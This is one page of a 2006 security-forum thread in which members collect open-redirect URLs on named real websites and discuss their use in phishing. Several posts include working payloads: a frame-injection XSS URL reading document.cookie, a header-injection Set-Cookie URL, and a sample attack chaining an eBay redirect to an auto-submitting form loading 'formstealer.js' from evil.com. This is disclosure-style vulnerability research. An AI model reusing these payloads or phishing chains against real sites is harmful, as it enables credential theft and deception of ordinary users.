Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011Next
Current Page: 4 of 11
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 05, 2006 11:01PM

that's because it's actually a variable.. not a file path

example: http://rds.yahoo.com/search/submit/ystdblahblahblahasdfjklhwkljfhakldfhasdf/*http://ha.ckers.org/

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: digi7al64
Date: October 05, 2006 11:06PM

given that i worked out you can just use

http://rds.yahoo.com/*http://ha.ckers.org/

must be anything with an asterix is defined as a redirect

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 08, 2006 05:46AM

http://www.gamedev.net/community/forums/goto.asp?redir=http://google.com

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: wwweirdo
Date: October 10, 2006 06:05PM

I've been lurking for a while and decided to join the fun.

In honor of their recent acquisition by Google...

http://www.youtube.com/verify_age?next_url=HTTP://SLA.CKERS.ORG

This one is 2-stage... you have to click on the button.

I tried to insert some script but no luck. Nevertheless, this one is neato.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: October 10, 2006 06:13PM

Welcome wwwweirdo and thanks for posting... which button do we need to click on or should we already be authenticated?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: wwweirdo
Date: October 10, 2006 06:22PM

Yup - be logged in to YouTube and you'll see the following:

This video may contain content that is inappropriate for some users, as flagged by YouTube's user community.

By clicking "Confirm," you are agreeing that all videos flagged by the YouTube community will be viewable by this account.

[Confirm] <- this is the button

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: October 10, 2006 06:38PM

Ah, gotcha... obscure but good find.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: wwweirdo
Date: October 10, 2006 06:42PM

Imagine that, an obsucure post by a guy named wwweirdo.

Shocking!

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: wwweirdo
Date: October 10, 2006 06:55PM

another

http://a.tribalfusion.com/h.click/FUCWKBJMNEKLHKPBRNWKCKJNRLSUQEYTQFCKKGQPTQRXIKJIGGOMHHDIKJSWRLNPIUEWKHHNMHOFEJOM/http://sla.ckers.org



Edited 1 time(s). Last edit at 10/10/2006 07:00PM by wwweirdo.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: wwweirdo
Date: October 10, 2006 07:21PM

http://directory.poland.com/link.php?url=http://sla.ckers.org

interestingly... browser url doesn't change, at least in firefox on leenucks.

anyone have msie handy?

I don't have time to see what it's doing right now, it's being demanded of me that I cook something.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 10, 2006 08:24PM

weirdo: that's because it loads it into a frame, not a redirect .. and fortunately, into a frame that you can break out of, like so:

http://directory.poland.com/link.php?url=http://maluc.sitesled.com/xss.html?%22%3E%3Cframe%20src=about:blank%20onload=alert(document.cookie)%3E%3C/frameset%3E

the first popup, is loaded by the
<frame src="http://maluc.sitesled.com/xss.html?">
and shows that it doesn't have access to the DOM or poland.com's cookies


the injected frame event, however, does:
<frame src=about:blank onload=alert(location.host+document.cookie)>
.. there's no cookies for directory.poland.com to demonstrate, but u get the idea.

You can combine it into one frame http://directory.poland.com/link.php?url=http://maluc.sitesled.com/xss.html?%22%20onload=alert(location.host%2Bdocument.cookie)%3E%3C/frameset%3E , i just did it separate to illustrate the difference.

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Ghozt
Date: October 11, 2006 10:38PM

oops, wrong thread.



Edited 1 time(s). Last edit at 10/11/2006 10:39PM by Ghozt.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 12, 2006 03:51AM

http://www2.warnerbros.com/event.ng/Type=click&Redirect=http:%2F%2Fwww.asdf.com

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: October 12, 2006 11:09AM

Maluc are you already testing these for HTTP Reponse splitting too? I don't want to do double duty on your finds if you are already looking for them.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 12, 2006 11:22AM

oh.. i didnt look for that one, because i was lazy .. and i'd bet that its vulnerable to it.

But generally i do check now.. so you could skip them if you want. However, i still don't fully understand all the variations and why. I just pieced it together by looking at the ones you posted.

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 12, 2006 11:29AM

actually, can you take a look at this one though? it only seems to allow 10 characters to be injected into the header..

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: October 12, 2006 12:12PM

You're absolutely right, this isn't exploitable for the soul reason that there just isn't enough data, although you can do annoying things like set cookies if for some reason that was helpful on that cname on that domain (ww2.):

http://www2.warnerbros.com/event.ng/Type=click&Redirect=%0ASet-Cookie:blah=blah

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 13, 2006 05:55PM

http://cgi1.ebay.it/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://google.com/

i can't take credit for this.. i found it thanks to a phishing email i received. Seems to work for all their TLD's .com .it etc .. just goes to show how dangerous redirects can be. Someone who thinks they know how to check if its real or not by looking at the domain (i.e. http //ebay.com.sk3dn.ru/ is fishy) .. will be fooled along with the totally clueless ones.
http //cgi1.ebay.it/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://200.72.242.999/mambo/cache/04110012600115000800008400061000640006100126/SignIncopartnerId=2pUserId=siteid=0pageType=pa1=i1=bshowgif=UsingSSL=ru=pp=pa2=errmsg=runame=ruparams=ruproduct=sid=favoritenav=confirm=ebxPageType=existingEmail=isCheckout=migrateVisitor.htm

looks pretty legit to a normal user. (changing the .999 to .44 will give you the live site)

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 13, 2006 06:22PM

amusingly, this would pass their 'spot a fake' tutorial..

Quote

Legitimate eBay Web Addresses
To determine if the Web address in your browser is a real eBay address, look for
".ebay.com" immediately before the first "/". In the below examples, notice that
there must be a "." before eBay.com for the address to be legitimate.

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: Ghozt
Date: October 13, 2006 06:37PM

@ maluc: Once it redirects, it doesn't pass the "Spot a fake" tutorial, because it shows the IP/mambo.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 13, 2006 07:38PM

You're correct, but getting them to click the link from their email is half the battle. Their mission may not be to just do the stereotypical fake login page.. but instead make use of an XSS hole on ebay.com that works for POST only. They could for example:

1.)Send them an email with:
http //cgi1.ebay.fr/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://evil.com
2.)Redirect them back to ebay using the POST xss
<form name="postxss" method="post" action="http://ebay.com/login.asp">
<input type="hidden" name="vulnerable" value='"><script src=http://evil.com/formstealer.js>' />
<input type="submit" />
</form>
<script type="text/javascript">
postxss.submit();
</script>

They click a valid ebay link in their email, and they see a valid ebay link at the end. Normally a POST xss would not be able to be distributed by email without the use of a redirect like so.. or an oviously fake domain
http //ebay.com.ebayverify.cz

-maluc



Edited 1 time(s). Last edit at 10/13/2006 07:41PM by maluc.

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 14, 2006 02:33AM

http://www.yellowpages.com/sp/exittracking/?&path=http%3A//www.asdf.com

http://www.switchboard.com/bin/cgiredir.dll?ID=515&URL=http://www.asdf.com

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: unsticky
Date: October 19, 2006 02:31AM

[www.theonion.com]

target=base64 encoded 'http://ha.ckers.org'

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 19, 2006 04:00AM

heh, don't see too many base64 in use .. unfortunately it goes to a 'leaving website' page for 10seconds before redirecting.. if you don't already have the 'premercial' cookie

but fortunately.. base64 and other encoding often gets overlooked for the filtering. so it left 3 points of injection

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: nrg
Date: October 20, 2006 10:12AM

maluc most tgp sites use base64 on the thumbnails when not using plain url, actually most tgp sites could be in this topic lol (and many might be good for HTTP Response splitting).

now one more redirection: http://shareup.com/getfile.php?v=8527&file=http%3A%2F%2Fwww.google.com

is this good for anything besides phishing?
also how can i see how is the redirection being done (see if its a 301 redirect or something like that)?

ty : )

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: October 20, 2006 10:31AM

nrg... I use burp proxy personally... it's by far the most useful tool in my haX0ring collection. Just adust the settings to watch both inbound and outbound connections and allow all types (not just text) and you'll see everything your browser sees in slow motion. It's super helpful, especially if you want to test alternate headers but don't want to have to build a custom flash file each time. Use it, love it.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 20, 2006 03:10PM

I asked the same question about the uses for phishing towards the beginning of this thread.. which RSnake answered well:
Quote

Well, if they are vulnerable to response splitting you get the side advantage of also getting some XSS out of it, but you're essentially right. Redirection is mostly for phishing, and mostly it's not good even for referrer masking as most browsers keep the referrer through 301 redirection of the original page, not the page that does the redirection itself.

However, for a limited time only (and in just 3 easy payments of 29.99) they're also useful for the IE6/IE7 bug http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/ which allows you to pull content remotely, from any domain, via javascript - with the use of any open 302 redirect that doesn't require you to start with http://. In other words, throws the Same Origin Policy out the window.

And as RSnake also pointed out on the ha.ckers blog.. that globally disables the CSRF protections of tokens. Once this is patched however, theyre mostly just good for phishing or response splitting or javascript:alert() type XSS. And referrer masking.

I too am in love with burp proxy.. although i generally use firefox's Live HTTP Headers extension instead, for things like viewing redirect types and paths. A personal preference..

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: rsnake
Date: October 20, 2006 07:15PM

Maluc, I owe you a beer sometime. Just accept it as a gift from me to you cuz you rock the house.

Anyway, I thought this one was amusing: https://www.scanalert.com/Link.sa?url=http://www.yahoo.com

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 20, 2006 08:03PM

lol, i'm not positive what i did to deserve it this time - but i've said before that i'm never one to turn down free liquor ^^.

and heh, always amusing to see security companies with security issues. i'm writing a mhtmlAPI.js right now, i'll be sure to have it run off scanalert..

-maluc

Options: ReplyQuote
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 23, 2006 10:21PM

Well after a great deal of testing.. if you want to solely use javascript for the mhtml exploiting, it requires more than just an open redirect by itself. needs one of the following to be true:

1. an open redirect, plus an XSS (persistent/reflexive) on the same domain.
2. an open redirect on your own domain
3. an open redirect susceptible to response splitting
4. other ways i'm too tired to think of

You could also use a proxy (like Google Translator) but that would defeat the purpose of CSRF as it'll be a Google bot that requests the page, not the victim.

Luckily, it's not tough to find an XSS hole in half of the domains in this thread. I found a persistent XSS in tinyurl which i'll be using once i find the time to finish this API for it. hopefully some time tomorrow

Edit: added #3 which RSnake pointed out is also possible

-maluc



Edited 1 time(s). Last edit at 10/23/2006 11:31PM by maluc.

Options: ReplyQuote
Pages: Previous1234567891011Next
Current Page: 4 of 11


Sorry, only registered users may post in this forum.